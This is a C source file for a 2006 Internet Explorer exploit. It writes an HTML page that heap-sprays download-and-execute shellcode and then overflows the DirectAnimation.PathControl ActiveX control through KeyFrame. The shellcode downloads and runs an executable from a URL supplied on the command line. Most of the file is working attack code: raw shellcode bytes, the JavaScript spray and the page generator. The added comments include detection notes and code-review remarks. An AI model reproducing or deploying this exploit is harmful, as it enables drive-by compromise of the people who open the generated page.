/*
*-----------------------------------------------------------------------
*
* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server SP4 CN
* : + Internet Explorer 6.0 SP1
* : Windows XP SP2 CN
* : + Internet Explorer 6.0 SP1 (You need some good luck!)
* :
* Compile : cl daxctle2.c
* :
* Usage :d:/>daxctle2
* :
* :Usage: daxctle <URL> [htmlfile]
* :
* :d:/>daxctle2 http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
/* Output stream for the generated HTML page. Opened with fopen() in main(),
 * written by both PrintUc() and main(); it is only fflush()ed, never
 * fclose()d. */
FILE *fp = NULL;
/* Output file name; this default is replaced by argv[2] when given. */
char *file = "xsec.htm";
/* argv[1]; main() copies it into buf directly after the payload bytes. */
char *url = NULL;
// Download Exec Shellcode by nop
/*
 * Opaque payload bytes. main() copies sizeof(sc)-1 bytes of this array into
 * buf and appends the URL string (plus its terminating NUL from the zeroed
 * buffer) right after them, so the payload presumably locates the URL at its
 * own end — that cannot be confirmed from this source. PrintUc() then emits
 * the combined bytes as "%uXXXX" escapes into the generated page.
 */
unsigned char sc[] =
"/xe9/xa3/x00/x00/x00/x5f/x64/xa1/x30/x00/x00/x00/x8b/x40/x0c/x8b"
"/x70/x1c/xad/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00"
"/xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xff/x16/x95"
"/xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xff/x56/x04"
"/xc7/x04/x03/x5c/x61/x2e/x65/xc7/x44/x03/x04/x78/x65/x00/x00/x33"
"/xc0/x50/x50/x53/x57/x50/xff/x56/x10/x8b/xdc/x50/x53/xff/x56/x08"
"/xff/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b"
"/x76/x20/x03/xf5/x33/xc9/x49/x41/xad/x03/xc5/x33/xdb/x0f/xbe/x10"
"/x3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/x40/xeb/xf1/x3b/x1f/x75/xe7"
"/x5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b"
"/x04/x8b/x03/xc5/xab/x5e/x59/xc3/xe8/x58/xff/xff/xff/x8e/x4e/x0e"
"/xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/xef/xce/xe0/x60/x36/x1a/x2f"
"/x70";
/*
 * First part of the generated page: the HTML prologue and the opening of a
 * <script> block whose first statement, `shellcode = unescape(...)`, is
 * left unterminated here. PrintUc() appends the "%uXXXX" words and the
 * closing `");`, so header, PrintUc() output and footer must be written in
 * that order (see main()).
 */
char * header =
"<html>/n"
"<head>/n"
"<title>XSec.org</title>/n"
"</head>/n"
"<body>/n"
"<script>/n"
"shellcode = unescape(/"%u4343/"+/"%u4343/"+/"%u4343/" + /n";
// Change this script by yourself.
/*
 * Remainder of the generated page's script. It builds a padding string
 * (bigbk doubled until it covers headersize + shellcode.length, then split
 * into fillbk and bk), grows bk until bk.length + slackspace reaches
 * 0x40000, and stores bk + shellcode into 800 array slots before creating
 * the "DirectAnimation.PathControl" ActiveX object and calling KeyFrame
 * with 0x7fffffff. For detection purposes, a page that sprays many large
 * unescape()d strings and then instantiates that ProgID and calls
 * KeyFrame() matches this generator's output.
 */
char * footer =
"bigbk = unescape(/"%u0D0D%u0D0D/");/n"
"headersize = 20;/n"
"slackspace = headersize + shellcode.length/n"
"while (bigbk.length < slackspace) bigbk += bigbk;/n"
"fillbk = bigbk.substring(0, slackspace);/n"
"bk = bigbk.substring(0, bigbk.length-slackspace);/n"
// bk = nop+nop;-)  (this C comment sits between two adjacent string literals
// of the same initializer; the concatenation continues below)
"while(bk.length+slackspace < 0x40000) bk = bk + bk + fillbk;/n"
"memory = new Array();/n"
"for (i=0;i<800;i++) memory[i] = bk + shellcode;/n"
"var target = new ActiveXObject(/"DirectAnimation.PathControl/");/n"
"target.KeyFrame(0x7fffffff, new Array(1), new Array(65535));/n"
"</script>/n"
"</body>/n"
"</html>/n";
// print unicode shellcode
/*
 * Write buffsize bytes of lpBuff as JavaScript "%uXXXX" escapes, eight
 * 16-bit words per line, to both stdout and the global fp. Each line is
 * wrapped in double quotes; in the file copy consecutive lines are joined
 * with `" +`, while the stdout copy omits the ` +` (the two outputs are not
 * identical). The final line ends with `");`, completing the
 * `shellcode = unescape(` expression opened in header.
 *
 * lpBuff   bytes to encode; read through an unsigned short* (alignment and
 *          strict-aliasing concern)
 * buffsize byte count; an odd value makes the last word read one byte past
 *          the given range
 * Requires fp to be open (set in main()). j, p and msg are unused.
 */
void PrintUc(char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
for(i=0;i<buffsize;i+=2)
{
/* every 16 bytes (8 words): close the previous quoted line and open a new one */
if((i%16)==0)
{
if(i!=0)
{
printf("/"/n/"");
fprintf(fp, "%s", "/" +/n/"");
}
else
{
printf("/"");
fprintf(fp, "%s", "/"");
}
}
/* word i/2 of the buffer as four hex digits after "%u" */
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
/* terminate the unescape("...") call started in header */
printf("/";/n");
fprintf(fp, "%s", "/");/n");
fflush(fp);
}
/*
 * Entry point: writes an HTML file consisting of header, the "%u"-encoded
 * payload-plus-URL produced by PrintUc(), and footer.
 *
 *   argv[1]  URL stored in the global url. Accepted when strstr() finds
 *            "http://" or "ftp://" anywhere in it (not only as a prefix)
 *            and strlen() is at least 10.
 *   argv[2]  optional output file name (default: the global file).
 *
 * Review notes:
 *  - void main is non-standard; C requires int main.
 *  - strstr, strlen, memset and memcpy are used with no #include <string.h>,
 *    so they are implicitly declared.
 *  - buf is 1024 bytes and url is copied after sizeof(sc)-1 bytes of payload
 *    with no length check (the "> 60" bound was commented out below), so a
 *    sufficiently long argv[1] overruns buf.
 *  - fp is fflush()ed but never fclose()d.
 */
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Internet Explorer COM Object Remote Heap Overflow Download Exec Exploit/n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org/n");
//printf("!!! 0Day !!! Please Keep Private!!!/n");
printf("/r/nUsage: %s <URL> [htmlfile]/r/n/n", argv[0]);
exit(1);
}
url = argv[1];
//if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
/* substring test, not a prefix test; the upper length bound above was removed */
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
//printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes./n");
printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
return;
}
printf("[+] download url:%s/n", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s/n", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!/n");
return;
}
// print html header
fprintf(fp, "%s", header);
fflush(fp);
// print shellcode
memset(buf, 0, sizeof(buf));   /* redundant: buf is already zero-initialized */
sc_len = sizeof(sc)-1;         /* payload length without the literal's NUL */
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));   /* unbounded: no check against sizeof(buf) */
sc_len += strlen(url)+1;       /* +1 keeps the NUL after the URL (from the zeroed buf) */
PrintUc(buf, sc_len);
// print html footer
fprintf(fp, "%s", footer);
fflush(fp);
printf("[+] exploit write to %s success!/n", file);
}